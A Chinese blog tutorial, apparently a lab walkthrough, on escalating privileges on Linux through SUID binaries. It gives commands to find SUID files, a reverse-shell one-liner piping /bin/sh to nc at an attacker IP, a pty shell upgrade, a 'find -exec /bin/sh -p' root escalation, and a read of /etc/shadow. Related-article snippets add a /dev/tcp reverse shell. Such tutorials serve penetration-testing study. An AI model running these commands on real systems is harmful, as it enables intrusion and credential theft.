linux suid提权

最新推荐文章于 2024-04-02 00:30:55 发布
最新推荐文章于 2024-04-02 00:30:55 发布
阅读量237 收藏
点赞数
分类专栏: # Linux提权篇 文章标签: linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73628117/article/details/132738029
版权

suid提权

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

SUID是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行
时,使调用者暂时获得该文件拥有者的权限。也就是如果ROOT用户给某个可执行文件加了S权限,那么
该执行程序运行的时候将拥有ROOT权限。

以下命令可以发现系统上运行的所有SUID可执行文件

find / -perm -u=s -type f 2>/dev/null   
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;

/表示从文件系统的顶部(根)开始并找到每个目录
-perm 表示搜索随后的权限
-u = s表示查找root用户拥有的文件
-type表示我们正在寻找的文件类型
f 表示常规文件,而不是目录或特殊文件
2表示该进程的第二个文件描述符,即stderr(标准错误)

// 2>/dev/null 就表示错误导入到/dev/null这个文件中,但是这个目录是不记录任何文件的,所以不会留下记录

进入这个网站查看利用方法:

https://gtfobins.github.io/

linux提权16

点击suid,

linux提权17

1.kali 开启端口监听
	nc -lvnp 8888
2.在靶机上的shell上输入命令
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.121.133 8888 >/tmp/f');  //ip为kali 端口则是和上面的一样

linux提权12

然后会发现无效,这是因为没有进行url编码,我们使用工具进行编码就行了。

成功后就会这个样子:

linux提权13

3.然后用python调用终端(不调用有些指令没有用)
python3 -c 'import pty;pty.spawn("/bin/bash")'

先看看权限,是普通权限

image-20230906193414638

4.再执行这行命令,就能提权成功了:
find . -exec /bin/sh -p \; -quit

linux提权15

如果有乱码输入 bash 就行了

然后在执行上面的命令

5.然后查看文件
cat /etc/shadow

有文件输出就是成功了

6.常见suid提权文件
nmap、vim、find、more、less、bash、cp、Nano、mv、awk、man、weget

功了

6.常见suid提权文件
nmap、vim、find、more、less、bash、cp、Nano、mv、awk、man、weget
日月言寺
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
suid提权linux
weixin_68652890的博客
04-15 968
suid提权 suid(设置用户的id)是Linux中的一种特殊权限,当运行具有suid权限的二进制文件的时候,使得调用者暂时获得该文件拥有者的权限(比如a文件拥有者是root,且被赋予了s权限,当我们用另外一个普通用户调用a文件的时候,调用过程中这个普通用户会获得root权限) 除了经常看见的rwx权限还有s权限 s权限,设置使文件在执行阶段具有文件所有者的权限,相当于临时拥有文件所有者的身份。 SUID 当执行的文件被赋予了s权限,就被称为Set UID,简称为SUID的特殊权限。简称为SUID的特殊权
Linux使用suid vim.basic文件实现提权
09-14
然而,SUID权限也可能被恶意利用,例如在提权攻击中。本篇文章将重点讨论如何通过SUID的`vim.basic`文件来实现提权。 首先,我们要确保有一个SUID权限的`vim.basic`文件。在Kali Linux系统中,我们可以使用`chmod`...
Linux提权————利用SUID提权
Fly_鹏程万里
05-23 2万+
bgvfdcfhjmkjnhb
Linux提权suid
最新发布
2301_76227305的博客
04-02 1055
以上总结的是常见的suid提权,后续会持续跟新。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
Linux SUID提权
她叫常玉莹
08-28 1857
概述findNmaplessbashvim 概述 SUIDLinux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限,如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具进行root提权。 目前可以用来提权Linux可执行文件列表 nmap vim find bash more less nano cp 用于查找SUID命令可执行文件的命令 find / -perm -u=s -type f 2>/dev/null find / -user roo..
linux系统suid提权
focus on security
05-19 5480
SUID提权 0x01什么是SUIDSUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义. ​ 在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果
Linux提权手法总结以及 Linux提权exp集合
02-22
Linux常见提权总结包括(内核漏洞提权suid提权、定时任务提权、sudo提权等等)
linux提权总结8大类型,30多种方式
09-27
linux提权总结8大类型,30多种方式 小白也能看明白的提权方法,包括内核提权,服务提权 sudo提权 suid提权sgid提权 定时任务提权 nfs提权 等待
Linux下非交互式提权详解
09-15
此外,利用SUID(Set-User-ID)或SGID(Set-Group-ID)权限的程序也可能成为提权的途径。 在进行非交互式提权时,可能需要测试多种工具和方法,例如利用系统漏洞的exploit,或者利用已知的权限滥用机制。通过将提权...
Linux提权SUID提权
mrx56的博客
04-09 4970
什么是SUID 首先Linux文件有u(用户),g(组),o(其他)三个属组和rwx(421)三种默认权限与两种附加权限 而两种附加权限分别是SET位权限(suid,sgid)和粘滞位权限(sticky)依次表示为sst(421),且分别都只能加在u,g,o属组表示的x(执行)位上。 当设置了x权限的同时设置了附加权限,则以附加权限的小写表示,反之大写。 设置了SET位权限可以获得该文件属主或属组账号对应的身份,粘滞位权限可以使其他用户或组拥有写的权限但是不能删除操作 而suid就是附加权限中的SET权限
Linux Suid提权
YouthBelief的博客
12-21 690
Suid提权 原理 SUID(设置用户ID)是一种权限类型,它被赋予一个文件,允许用户以其所有者的权限执行该文件。Linux二进制文件可以拥有这种类型的权限集有很多原因。例如,ping实用程序需要root权限才能打开网络套接字,但它也需要由标准用户执行,以验证与其他主机的连通性。 但是,如果某些现有的二进制文件和实用程序具有 SUID 权限,则它们可用于将权限提升为 root。 suid权限 表示 chmod u+s 如下 二进制文件以 root 权限执行,因为它们的权限中包含“ s ”,并且它们归 roo
Linux:SUID提权
Elite的博客
03-05 2087
以find命令为例,讲解SUID提权原理
Linux-suid提权
liver100day的博客
11-16 1332
ww
LinuxSUID提权方法
good good study
10-29 3865
SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。 已知的可用来提权linux可行性的文件列表如下: nmap vim find bash more less nano cp 如下,新建一个2.txt的文件。我们查看权限为 -rw-r--r--。接下来我们加上suid权限,即让执行该命令的用户以命令拥有
linuxsuid提权笔记
热门推荐
Shanfenglan's blog
08-23 26万+
find find /bin/ -name ls -exec /bin/nc -lvp123 ; find /bin/ -name ls -exec /bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&1 ; find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null less less /etc/passwd !/bin
Linux-suid提权学习
weixin_43749601的博客
10-21 350
SUID提权是给予文件的一个一个特殊类型的文件权限。在 Linux/Unix中,当一个程序运行的时候, 程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的(程序/文件)所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的权限以及所有者的UID和GID。 以下命令可以发现系统上运行的所有SUID可执行文件。 find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000-print2&g

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值